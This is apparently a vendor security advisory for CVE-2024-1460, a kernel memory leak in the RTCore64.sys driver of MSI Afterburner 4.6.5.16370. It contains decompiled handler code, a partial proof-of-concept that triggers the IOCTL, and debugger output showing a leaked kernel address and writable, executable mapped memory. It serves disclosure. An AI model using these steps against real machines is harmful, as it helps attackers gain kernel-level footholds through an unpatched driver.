---
slug: advisories/mingus/
title: MSI Afterburner v4.6.5.16370 - KM Leak
authors: Andres Roldan
writer: aroldan
codename: mingus
product: MSI Afterburner v4.6.5.16370
date: 2024-03-06 12:00 COT
cveid: CVE-2024-1460
severity: 5.6
description: MSI Afterburner v4.6.5.16370 - Kernel Memory Leak Vulnerability
keywords: Fluid Attacks, Security, Vulnerabilities, Leak, CVE
banner: advisories-bg
advise: yes
template: advisory
---

## Summary

| | |
| --------------------- | ---------------------------------------------------------------------------------|
| **Name** | MSI Afterburner v4.6.5.16370 - Kernel Memory Leak |
| **Code name** | [Mingus](https://en.wikipedia.org/wiki/Charles_Mingus) |
| **Product** | MSI Afterburner |
| **Vendor** | Micro-Star INT'L CO. |
| **Affected versions** | Version 4.6.5.16370 |
| **State** | Public |
| **Release date** | 2024-03-06 |

## Vulnerability

| | |
| --------------------- | ----------------------------------------------------------------------------------------------------------------------------|
| **Kind** | Kernel Memory Leak |
| **Rule** | [037. Technical Information Leak](https://help.fluidattacks.com/portal/en/kb/articles/criteria-vulnerabilities-037) |
| **Remote** | No |
| **CVSSv3 Vector** | CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:H |
| **CVSSv3 Base Score** | 5.6 |
| **Exploit available** | Yes |
| **CVE ID(s)** | [CVE-2024-1460](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-1460) |

## Description

MSI Afterburner v4.6.5.16370 is vulnerable to
a Kernel Memory Leak vulnerability by triggering the
`0x80002040` IOCTL code of the `RTCore64.sys` driver.

## Vulnerability

The `0x80002040` IOCTL code of the
`RTCore64.sys` driver allows map up to `0x20000` of
a physical address from range `0xC0000` to `0xE0000`
on a non-paged virtual kernel memory range whose address
can be leaked. That physical range is commonly used to
store BIOS information of the device's motherboard.

The handling decompiled code of the `0x80002040` IOCTL
starts with:

```c
case 0x80002040:
    if ( Options == 0x30 )  // [1]
    {
    v33 = sub_11388(SystemBuffer);  // [2]
    pIrp->IoStatus.Status = v33;
```

At `[1]` a check is made on the `InputBufferLength` parameter
of the IOCTL request call. If it's equal to `0x30` bytes,
the function `sub_11388` is called at `[2]` with the `SystemBuffer`
as a parameter.

Inside `sub_11388`, a call to `sub_11044` is performed and
the code checks if the returned value is not `NULL`:

```c
if ( !sub_11044(*(_QWORD *)SystemBuffer, *(_DWORD *)(SystemBuffer + 0x10), (ULONG *)(SystemBuffer + 0x20)) )
    return 0xC0000001i64;
```

The only condition that returns not NULL at `sub_11044` is:

```c
if ( SystemBuffer >= 0xC0000 && SystemBuffer + PhysAddressOffset <= 0xE0000 )
    return 1;
```

After that check the code that follows on `sub_11388` is:

```c
pSystemBuffer = *(_QWORD *)SystemBuffer;
AddressSpace = 0;
if ( !HalTranslateBusAddress(Isa, 0, (PHYSICAL_ADDRESS)pSystemBuffer, &AddressSpace, &PhysicalAddress) )
    return 0xC000009Ai64;
v4 = MmMapIoSpace(PhysicalAddress, *(unsigned int *)(SystemBuffer + 0x10), MmNonCached);  // [1]
if ( !v4 )
    return 0xC000009Ai64;
*(_QWORD *)(SystemBuffer + 8) = v4;  // [2]
```

At `[1]` the code uses `MmMapIoSpace()` to
map the physical address range from `0xC0000` up to the
offset passed on `SystemBuffer + 0x10`. At `[2]` the
code writes to `SystemBuffer + 0x8` the address
returned by `MmMapIoSpace()`.

A snipped of the Proof-of-Concept that passes all the
checks is:

```c
SIZE_T inputSize = 0x30;
...
ULONGLONG outbuf_allocation_addr = 0x00000000000C0000;
...
((PDWORD64)((DWORD64)inBuf + 0x0))[0] = (ULONGLONG)outBuf;
((PDWORD64)((DWORD64)inBuf + 0x10))[0] = (ULONGLONG)0x000000000001F000;
```

The output of the Proof-of-Concept is:

```powershell
PS C:\Users\admin\Desktop> .\PoC.exe

[+] Bytes sent: 48 (0x30)
[+] Bytes returned: 48 (0x30)
[+] Leaked address FFFF9F80C64C0000 (SystemBuffer + 0x8)
[+] Output (0): 00000000000C0000
[+] Output (8): FFFF9F80C64C0000
[+] Output (16): 000000000001F000
[+] Output (24): 4444444444444444
[+] Output (32): 4545454545454545
[+] Output (40): 0000000146464646
```

In the debugging session, the contents of
the mapped address can be seen. It contains
strings like `VESA` and `VBE2` which are
part of the BIOS of the GPU's motherboard used.
The mapped address is also executable `E(1)`
and writable `W(1)`:

```c
0: kd> !process 0 0 poc.exe
PROCESS ffffb30d35432080
    SessionId: 1  Cid: 1354    Peb: a4c8e97000  ParentCid: 08bc
    DirBase: 1479d1000  ObjectTable: ffff8c0ee3f5d8c0  HandleCount:  43.
    Image: PoC.exe

0: kd> ba e1 /p ffffb30d35432080 rtcore64+13df
0: kd> g
Breakpoint 0 hit
RTCore64+0x13df:
fffff807`715b13df ff154b1c0000    call    qword ptr [RTCore64+0x3030 (fffff807`715b3030)]
1: kd> dps fffff807`715b3030 L1
fffff807`715b3030  fffff807`7555f0b0 nt!MmMapIoSpace
1: kd> p
RTCore64+0x13e5:
fffff807`715b13e5 4885c0          test    rax,rax
1: kd> dc @rax L50
ffff9f80`c64c0000  cb80aa55 804f05b8 097400fc 0f4ffc80  U.....O...t...O.
ffff9f80`c64c0010  cf00ac84 0f033ccf 3c00a084 60f57512  .....<.....<.u.`
ffff9f80`c64c0020  40ba5066 01b86620 66000000 c8fe42ef  fP.@ f.....f.B..
ffff9f80`c64c0030  5866ef66 b003c2ba c6baeee3 eeffb003  f.fX............
ffff9f80`c64c0040  3103c8ba b942eec0 82e80040 e2c4fe03  ...1..B.@.......
ffff9f80`c64c0050  0473bff9 ba0005b9 66e803c4 04a6bf03  ..s........f....
ffff9f80`c64c0060  ba0009b9 5ae803ce 0491bf03 ba0015b9  .......Z........
ffff9f80`c64c0070  c0bb03da 50c03003 da8758ec 8a2e50ee  .....0.P.X...P..
ffff9f80`c64c0080  58ee4705 da87c0fe 87ecede2 ee20b0da  .G.X.......... .
ffff9f80`c64c0090  b90478bf d4ba0019 7f11b803 1165222e  .x..........."e.
ffff9f80`c64c00a0  031fe8ef a000b806 bffcc08e 00b90000  ................
ffff9f80`c64c00b0  f3c03180 b86107ab b8cf0050 3ccf0050  .1....a.P...P..<
ffff9f80`c64c00c0  3c1c7400 88840f01 0f023c00 3c01a884  .t.<.....<.....<
ffff9f80`c64c00d0  2e840f03 0f093c02 b8023184 66cf014f  .....<...1..O..f
ffff9f80`c64c00e0  c08c1e50 8b66d88e 562d6605 66324542  P.....f..f-VBE2f
ffff9f80`c64c00f0  455605c7 45c74153 c7020004 04af0645  ..VESA.E....E...
ffff9f80`c64c0100  66084d8c 030a45c7 c7000000 05900e45  .M.f.E......E...
ffff9f80`c64c0110  66104d8c 400000b8 e8c16600 12458910  .M.f...@.f....E.
ffff9f80`c64c0120  001445c7 1645c701 4d8c04b6 1a45c718  .E....E....M..E.
ffff9f80`c64c0130  4d8c04bd 1e45c71c 4d8c04cb 2245c720  ...M..E....M .E"
0: kd> !ptev2(0xffff9f80c64c0000)
Virtual address: -106099545210880
Pml 4 address: 0x2e6d68000
Level: 4, Entry Address: 0x2e6d689f8
Value = 0xa00000004731863
    P(1), W(1), E(1), A(1), D(1), K(1), Large(0)
    Pfn: 0x4731

Level: 3, Entry Address: 0x4731018
Value = 0xa00000004732863
    P(1), W(1), E(1), A(1), D(1), K(1), Large(0)
    Pfn: 0x4732

Level: 2, Entry Address: 0x4732190
Value = 0xa000002e8a85863
    P(1), W(1), E(1), A(1), D(1), K(1), Large(0)
    Pfn: 0x2e8a85

Level: 1, Entry Address: 0x2e8a85600
Value = 0xa000000000c0b63
    P(1), W(1), E(1), A(1), D(1), K(1), Large(0)
    Pfn: 0xc0
```

## Our security policy

We have reserved the ID CVE-2024-1460 to refer
to this issue from now on.

* https://fluidattacks.com/advisories/policy/

## System Information

* Version: MSI Afterburner v4.6.5.16370
* Operating System: Windows

## Mitigation

There is currently no patch available for this vulnerability.

## Credits

The vulnerability was discovered by
[Andres Roldan](https://www.linkedin.com/in/andres-roldan/)
from Fluid Attacks' Offensive Team.

## References

**Vendor page** <https://us.msi.com/>

**Product page** <https://www.msi.com/Landing/afterburner/graphics-cards>

## Timeline

<time-lapse
discovered="2024-02-08"
contacted="2024-02-23"
disclosure="2024-03-06">
</time-lapse>
